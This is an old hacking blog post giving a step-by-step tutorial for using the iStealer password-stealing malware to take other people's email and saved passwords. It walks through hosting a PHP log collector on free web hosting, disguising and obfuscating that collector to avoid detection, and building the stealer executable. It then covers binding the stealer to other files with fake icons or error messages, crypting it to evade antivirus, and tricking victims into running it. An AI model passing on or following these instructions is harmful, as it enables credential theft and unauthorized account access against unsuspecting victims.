73D41416194E8A7C390936971FB2B74B Chira Sathi: Istealer Password stealer - hack email passwords:

Sunday, September 25, 2011

Istealer Password stealer - hack email passwords:

 Istealer is an efficient windows password stealer software used to hack email account passwords. I have already explained about RATs and keyloggers to hack email account passwords, where you have to send your keylogged file to victim. In the same way, Istealer can be used to hack email account password and find passwords of various emails. I have provided link for software download... just read on.

email hacking
STEP 1: Free download Istealer password stealer software to hack email account password.

It will show a virus , but its just a false positive since this is a stealer software, so don't worry.

STEP 2: Go to a free webhosting service like http://www.esmartstart.com/ or http://www.000webhost.com/ and sign up for free account. Here I am using 000webhost.

email password hacking

email hacking
  • Now , the account is made. (Confirm it from your email)
  • Now, login to the account and go to the Control Panel (CPanel)
  • Scroll down to MySQL under "Software / Services".
email hacking

Follow this picture now :

email hacking

Now, SAVE the info you receive about on the next page in notepad.

STEP 3: Setting up index.php file (Php Logger)
  • Extract iStealer 6.3 rar file and after that extract PHP Logger rar file.
  • You will see PHP Logger folder.Open it.Now you see two files.
    • index.php
    • style.css
  • Open index.php using notepad and follow this pic :
email hacking

To remember :- The admin and admin which you entered in $username and$password line is the password to see your logs.

STEP 4 : Making your index.php undetectable by hosts like 000webhost
  • Open index.php and change the following lines
  • PHP Code:$html = "<html><head><title>iStealer 6.1 Legends Log manager - ";To PHP Code:$html = "<html><head><title>My Personal Software manager - ";  and PHP Code:$footer = "<div id='footer'>iStealer 6.1 Legends - Kizar Labs 2009</div> </div> </body> </html>";ToPHP Code:$footer = "<div id='footer'>Backup manager - Backup Script 2010</div> </div> </body> </html>";
  • Now download and install this software : TrueBug PHP Obfuscator & Encoder. (Google for download link, trial version is also ok.)
  • Open it and go to "Files and Folders"
  • Source Folder - select folder containing your PHP scripts, click on the browse button beside the folder name box. Target Folder - select folder where the obfuscated and encoded files will save to, click on the browse button beside the folder name box. Select files to be obfuscated/encoded, click on check-box front of filename (index.php) in the file list-box
  • Now to go "Obfuscate & Encode" Set the output options as "Obfuscate & Encode" and check EVERYTHING and click "Process" then press "Close" button and also close program.
  • You will find an obduscated index.php in the output folder which you selected. Now remember this is the index.php which you have to upload to 000webhost , not the original one.
STEP 5 : Uploading Files (index.php and style.css on 000webhost)
  • Go to your Control Panel in 000webhost
  • Now, Go to File Manager. If it asks for password , see the "View FTP Details" which appears beside File Manager in Control Panel.
  • Now to go public_html. Then click on "New dir". Enter the directory name like hobby or work or passion or something like that.
  • Now go the the directory you just created and create further 2 sub-directories inside it as you did in the previous step.
  • So it will be something like this public_html > hobby > test and work
  • Now go to any of the last 2 directories you just created and click on the "Upload button" select index.php and style.css and then click the Tick button to upload.
  • Go back to the root folder and tick the box beside public_html and then click on the "Chmod" button and follow this pic :
email hacking

STEP 6 : Building your iStealer
  • Run the iStealer6.3Legends.exe file present in iStealer6.3 folder to get something like:
  • email hacking
  • Now, simply fill the following in Istealer: Url: yourdomainname.com/index.php
  • You can bind Istealer to any other file by checking "Bind with another file" and giving file path to bind with. Also, you can use Icon Change to change Istealer file icon. This step is optional but, necessary for hiding password stealer from victim's eyes. You can bind password stealer file with fake error message as I have explained in "Fake Error Message generator" to make it look real.
  • To check whether you have entered right ftp server information, hit "Test Url" and if you have done it right, you will get message "Works perfect!". If it says "Logger not found, check the Url", you have entered something wrong... just check it again.
  • When you've done all above steps, simply hit on "Build" and save the password stealer file as you want.
  • You can also use Crypter to avoid antivirus detection.
CONGRATS ! Your server is now ready !! Now, simply send this password stealer file to victim and make him run this windows password stealer file on his computer(Social Engineering). After he runs our sent password stealer file on his computer, you will get all passwords and records saved on his computer at your FTP server. That's it. Thus, you can hack email account password using Istealer- the windows password stealer software.

Video Tutorial : How to set up Istealer 6.3 here

Video Tutorial : Installing modded php tutorial here

Remember to crypt this windows Password stealer to make it undetectable by antivirus. If you have any problem in using this Istealer password stealer software to hack email account password, please mention it in comments. Enjoy Istealer to hack email account password...

Enjoy HaCkInG.....

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